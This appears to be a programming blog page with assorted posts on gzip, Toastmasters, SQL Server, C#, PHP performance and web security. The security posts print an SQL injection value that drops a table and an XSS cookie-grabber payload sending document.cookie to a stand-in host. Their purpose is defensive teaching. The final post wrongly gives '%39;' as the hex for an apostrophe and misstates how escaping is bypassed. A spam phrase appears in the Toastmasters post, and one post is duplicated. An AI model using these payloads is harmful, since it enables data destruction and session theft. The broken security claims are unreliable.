Categories Tags

Blog

In a data load, we receive some zipped files (*.gz) I found that when you use the regular extraction:

gzip.exe -d -f "foo.csv.gz"

The “foo.csv.gz” file will automatically be deleted by gzip and replace it with “foo.csv”

However, if we are archiving these csv files it will take up a fair bit more space, so we wanted to just store the archived version of the flat file.

Originally I thought that I was going to need to unzip them, then rezip all of the files at the end of the process to get the files ready for archival but this took was just a lot of extra processing.

Finally I came across a way to avoid the deletion of the file If you output the file to standard out you are able to then redirect that output stream into your output file (without affecting the original .gz file).

Verdict:

gzip.exe -d -f -c "foo.csv.gz" > foo.csv

This will take all of the contents from the gz file and push it to STDOUT and then with using the >, we redirect the information written to STDOUT to the CSV file where we need it.

Hope this helps

Reference: http://stackoverflow.com/questions/7351887/gzip-extracting-without-deleting-zip-file

Posted in tools

Tags:

When I was on my second Co-op work term, one of my bosses had suggested to me that I join Toastmasters. What is Toastmasters? It is an organization which was formed to help people to work on their public speaking skills. This past year when writing up my personal goals, I finally decided that it was time to take this advice.

I started visiting a club near my house back in January, and man was I impressed. Not only at the professionalism of the group, but at how friendly and warm everyone around you was. This was truly a safe place for people to go who lack confidence in the speaking. That night, I heard speeches from three different club members of varying levels. Man these were impressive. Some of the speakers I swore were professionals. Along with that, I got to partake in the Table Topics which is essentially a way to get you to start talking off the top of your head on a topic that is just presented to you. I was incredibly nervous.

I still remember it. I had to talk for 30 seconds to a minute about pasta (the topic for the day was nutrition). What am I to say?

Three weeks later, I became a member. Shortly after that, I started taking on roles at the meeting in order to increase my speaking time a bit.

My first role was the Timer. Sitting and listening to the timer’s little blurb at the beginning, each and every week I thought to myself that I could easily do it. And then it was my time to speak, and I froze. I felt like a babblering fool not able to formulate my thoughts properly despite the fact that I had said it to myself several times before that.

I went on to do a few more roles in the weeks to come in order to help raise my confidence and get used to the nervous feeling a little more and more each week. It was working. People around me had started noticing slight improvements in my speaking.

This week was my Ice Breaker. I spoke about my dog and how having him influenced what I eventually saw as my career path. When did I actually write the Ice Breaker? Saturday. Was I 100% ready for it? Probably not, but I still decided despite the fact that I didn’t feel 100% prepared (i.e. I didn’t have the entire speech memorized), I still felt I needed to get up and do it, otherwise I would just keep putting it off. So, I took the plunge.

Man it felt weird! The minute I got up there in front of everyone, my mind went blank. I had practiced my speech several times both in front of my family and by myself, but the fact that I was saying it in front of 30 unfamiliar faces felt completely different. First thing that I noticed was that time flew. The speech that I had timed to be 5 minutes and 40 seconds turned into a 6 minute and 29 second speech, 29 seconds over the time limit. Mentally I knew that I knew the contents of the speech because I lived it and I had practiced my wording of it. But then as soon as I got up there, everything changed. I tried not to use my notes but every once in a while I needed that little cue. Not only that, but as soon as I started talking, my mind felt like it was 2 paragraphs ahead of what my mouth was actually saying. I was so confused. In the end, I think I got my daily exercise from the amount of nervous walking that I did, and I hope that I wasn’t just muttering words which I felt that I was at time (everything felt so disjointed in my head, but that could just be my interpretation).

The group was entirely understanding of the feat that I just went through. No matter how badly I felt I screwed it up, the rest of the club seemed to cheer me on which felt good. I know it wasn’t the best online pokies sites speech anyone had ever heard, but what the heck, it was my first one.

I look forward to writing and practicing my second speech hoping that the next time I go up maybe my mind will be a little more clear.

I encourage anyone who feels that they lack the confidence in their verbal communication skills to try a Toastmasters club near you. I’ve been a member since February and no two meetings are the same, and I actually feel kind of sad when I am not actually able to make it to the Wednesday night meeting.

I would strongly encourage anyone to find one in your area to try it out. You won’t regret it!

Thanks for reading

Posted in php

Tags:

With databases sometimes you need to run tasks that take a while in order to complete. In the past I have found it hard to judge the status of a request. For example, we do backups and restores of a 40 GB database.

Normally this doesn’t take very long to accomplish (30-40 minutes) but there is no sort of progress bar on the query to judge complete a specific task is. Luckily after hunting through Google for a while I found a query that you are able to run to find how complete system tasks are. The query is as follows:


SELECT session_id, command, percent_complete FROM sys.dm_exec_requests

This query will return a list of the commands currently running as well as the percentage complete.

session_id command percent_complete
## BACKUP DATABASE 25.6985%

With databases sometimes you need to run tasks that take a while in order to complete. In the past I have found it hard to judge the status of a request. For example, we do backups and restores of a 40 GB database.

Normally this doesn’t take very long to accomplish (30-40 minutes) but there is no sort of progress bar on the query to judge complete a specific task is. Luckily after hunting through Google for a while I found a query that you are able to run to find how complete system tasks are. The query is as follows:


SELECT session_id, command, percent_complete FROM sys.dm_exec_requests

This query will return a list of the commands currently running as well as the percentage complete.

session_id command percent_complete
## BACKUP DATABASE 25.6985%

Posted in sql-server

Tags:

sql

Problem:

Capitalizing the first character of each word in a string (i.e. “the final countdown” → “The Final Countdown”).

Solution:

C#:

C# has a built-in function for this. Its called ‘toTitleCase’, hidden deep within the System.Globalization namespace.

So how do you use it?


using System.Globalization;
 
...
// Get the instance of the TextInfo class to use to (no constructor), comes from the current thread
TextInfo info = (System.Threading.Thread.CurrentThread.CurrentCulture).TextInfo;
 
string sample = "hello world";
 
// Print to console the title case
// Outputs: Hello World
Console.WriteLine(info.ToTitleCase(sample));

The ‘ToTitleCase’ function returns an instance of a string which will have all of the first characters in words changed to upper case, and leaves the rest of the text as is. This means that if a word is in all capital letters it will remain that way. A simple work around for this is to call the string object’s ‘ToLower’ function before we send the string into the ‘ToTitleCase’ function.

For example,

using System.Globalization;
 
...
// Get the instance of the TextInfo class to use to (no constructor), comes from the current thread
TextInfo info = (System.Threading.Thread.CurrentThread.CurrentCulture).TextInfo;
 
string sample = "HELLO world";
 
// Print to console the title case
// Emits: HELLO World
Console.WriteLine(info.ToTitleCase(sample));
 
// Pre-lowercase everything
// Emits: Hello World
Console.WriteLine(info.ToTitleCase(sample.ToLower()));

PHP:

The PHP version of this function is a fair bit easier to get to.  PHP’s function is called ‘ucwords’.  However, similar to the C# version you should always have the string sent in in lower case if you want it to only make the first character of each word upper case (it only changes the first character and doesn’t touch the others).


// Outputs: The Final Countdown
echo ucwords('the final countdown');

Posted in programming

Tags:

I was implementing an image resizer and I kept running into a problem where I kept getting error messages saying that the image file was in use even after I disposed of the object in memory (the last step was to remove the unresized image).

Calling object.Dispose() is just a suggestion to say “whenever you want, we don’t need this in memory anymore”. However, because it doesn’t get rid of it immediately, meaning that it is still being referenced which means that the file won’t be able to be deleted immediately.

In order to get around this, you need to call the garbage collector yourself to force the application to get rid of the object from memory.

The code:


string dest = @"C:\";
FileInfo imageFile = new FileInfo(file);
Image image = ResizeImage(Image.FromFile(file),size);
 
// Save the file to the file system
SaveAsJpeg(image, dest + imageFile.Name, 100);
 
// We don't need the image in memory any more (suggest it to be deleted)
image.Dispose();
 
// Call the garbage collector
GC.Collect();
GC.WaitForPendingFinalizers();
 
// Delete the old file
imageFile.Delete();

Posted in php

Tags:

Just because PHP allows you to do something, doesn't mean that it is the best thing to do.  For example, PHP will automatically convert single word strings (non-quote/apostrophe delimited) into an actual string if required.


$arr = array();

for($x=0;$x<1000000;$x++)
{
    $arr[foo]='bar';
}

In this case, PHP will automatically convert foo to the string 'foo'. However, this up conversion doesn't come without a cost. For example, when timing the use of this script, the following are the results:

$ time php test.php 

real    0m1.641s
user    0m1.424s
sys     0m0.044s

However, when running the following script and not forcing it to up convert, the results are extremely different.


$arr = array();

for($x=0;$x<1000000;$x++ )
{
    $arr['foo']='bar';
}

In this case, the word 'foo' is already pre-defined as a string, so no up conversion is required. The time for this is as follows:

$ time php test.php 

real    0m0.467s
user    0m0.292s
sys     0m0.052s

As you can see, by including the quotes and telling PHP that it actually is a string, you can potentially reduce the execution time for your PHP scripts.

Keep this in mind when using the associative arrays in PHP.

Posted in php

Tags:

I must first start this post with a comic on the topic ... it comes from xkcd.com.

Exploits of a Mom

Anyways, this shows one of the many reasons why one should never trust any input from a user. This means that you should assume that all users have malicious intent and are attempting to break into your site. Of course, this is not always the case however, when it is, bad things can happen all around. No matter how you are getting data from the user, be it through an input field, URL, hidden field, drop down list etc. users are able to change the information to better suit their attacking desires. This means always make sure that the data is within the bounds of what is expected! What are some examples of bad things which can happen from the user of exploits? I have listed two of the more common threats which I see on a day-to-day basis.

  • SQL Injection - As portrayed in the comic from XKCD, if the correct security precautions are not in place, anything which is stored in your database can be eliminated within seconds or worse, modified in a manner you are not able to notice until it's too late. For example, if one is working on a website which has a built-in 'karma' system where the higher 'karma' a user has, the more things they are allowed to do on the site. If the website allows for SQL injection (accidentally of course), what is to stop the user from slowly increasing their 'karma' at a gradual rate until they have increased it so much that they are now in a new 'karma' category. Would this be noticeable? Probably not. Either way, if the user attacker truncates or deletes your tables, or even updates their records a bit to get more out of the site than they have achieved, these are all bad things which could happen ... and can easily be prevented by becoming aware of what is going on around you.
  • Cross Site Scripting (XSS) - Security flaws unintentional coded into applications which will allow the user to inject special code onto a site which can be extremely detrimental to any site. A simple example of XSS would be a cookie grabber. A fair number of the cookie grabbers I have seen come from the use of BBCode and the lack of proper validation for it. The theory behind a simple cookie grabber is that it will use any pre-existing javascript on the site (or use it's own) in order to send site-specific information to a different source. However, cookie grabbers are not the only problems from XSS. If the correct precautions are not in place the use of PHP's "include" or "require" function can have your site acting as a portal through the internet for anybody to use as they please. Similar to SQL injection, this can be prevented with the proper knowledge.

Examples!

SQL Injection Just say you have a form where you allow the user to select how many records they want to display:

<form method = "post" action = "results.php">
How many records should be displayed?
  <select type = 'text' name = 'count'>
    <option value = '5'>5</option>
    <option value = '10'>10</option>
    <option value = '15'>15</option>
  </select>
  <input type = 'submit' />
</form>

And the back end of your application looks something like this:


    $query = "SELECT * FROM `news` LIMIT " . $_POST["count"];
    $res = mysql_query($query);

What is to stop the user from modifying one of the values in the drop down list to:


5; DROP TABLE `news`;

Nothing! However, if you don't prevent such a thing from being allowed in your query (i.e. not doing enough data validation), after the user runs that query, your entire 'news' table will be dropped from the system, which was probably not what was originally intended for the script. I have mentioned this method of prevention before, and I'll mention it again, SQL prepared statements. If data is sent in as a parameter rather than as a direct part of the query, there are no chances that the query may be mistaken and have two queries execute instead of one. Cross Site Scripting (XSS) These security vulnerabilities can be fairly hard to track down, however there is always a way. Simple XSS Just say you have your URLs as something like this: http://url.com/read.php?file=temp.php Where in your actual PHP script you have a server side include for whatever value was passed in through $_GET. Well, this is opening up an entirely new can of worms. Yes it works for pages which are on your server, however, it will also work for sites which are off site if you are not careful in your validation. Sample Code:


// This is a VERY bad idea, however it is only an example
include($_GET['file']);

If I were to change the URL from: http://url.com/file=temp.php To: http://url.com/file=http://www.google.com By default, PHP will not think anything of it. It will treat the website as a file stream just as it does the 'temp.php' which was originally passed in. And low and behold, somebody is now using your site to access Google. Lesson: validate and verify that the file exists LOCALLY before running the include. Cookie Grabber Since cookies are only accessible on the site which they are associated with, cookie grabbers must use this in order to get the information they need. A fair number of implementations of BBCode which I have seen have allowed for gaping holes because of this. For example, most implementations use regular expressions in order to pick up on the required information (which is what they should be used for). However, since urls and things can have a large number of characters, most programmers choose to use the greedy approach and use the 'anything but newline character' (the period). Regex (something similar to this, as I cannot remember the exact regular expression):

\[img=(.*)\]

This regular expression will then be replaced in the emitted HTML code to be:

<img alt="" src="$1" />

This is all fine and dandy, and it picks up what is required however, it also has the ability to pick up more than expected and/or desired. For example, if the following was provided it would allow the user to gain access to the cookies which are for a particular site.

[img=http://www.google.ca/logos/gabor10-hp.png" onclick="document.location.href='http://some_other_url.com/cookies.php?cookie='+document.cookie]

This has the potential for changing the emitted HTML into becoming:

<img alt="" src="http://www.google.ca/logos/gabor10-hp.png" />

Effectively causing your web browser to relocate to a different URL with your cookie in the link which they will then log for future use. Of course, if a little extra time was spent in the sanitation of the input problems like this can be filtered out.

Summary: In summary, never ever ever trust user's input. It will only lead you towards worlds of pain. Hope this helps!

Posted in php

Tags:

I have recently seen posted numerous times that if you run the function 'mysql_real_escape_string' on any data, you are then automatically safe from SQL injection. Well, this isn't the case at all ... To start, let's look at what php's documentation about 'mysql_real_escape_string' says: php.net

Escapes special characters in the unescaped_string, taking into account the current character set of the connection so that it is safe to place it in a mysql_query(). If binary data is to be inserted, this function must be used. mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. This function must always (with few exceptions) be used to make data safe before sending a query to MySQL.

So, not only does it force you to have the mysql connection (why is this really needed for just escaping a few characters?), it just adds a '\' before some of the characters which could break a query. This is because lots of people write queries as follows:


$query = "SELECT `user_id`, `username`, `startdate` FROM `users` WHERE `username` = '$username'";

However, if $username contains "blarg'; DROP TABLE `users`; --", then mysql_real_escape_string will change it to "blarg\'; DROP TABLE `users`; --" which will not break the query (so the users table will not be dropped). But if the attacker was smarter and used a different representation of it by using %39; (hexadecimal value for '), mysql_real_escape_string will not touch it, so it will go into your query and inconveniently drop your table. This small example shows the the use of 'mysql_real_escape_string' is ineffective in preventing against SQL injection. Instead of using 'mysql_real_escape_string' I would strongly suggest the use of database parameters (prepared statements) for all queries, or create a way which will convert from the %39; to their corresponding values (i.e. html special chars decode) just to make sure that characters you don't want to be in there don't sneak in.

Posted in php

Tags: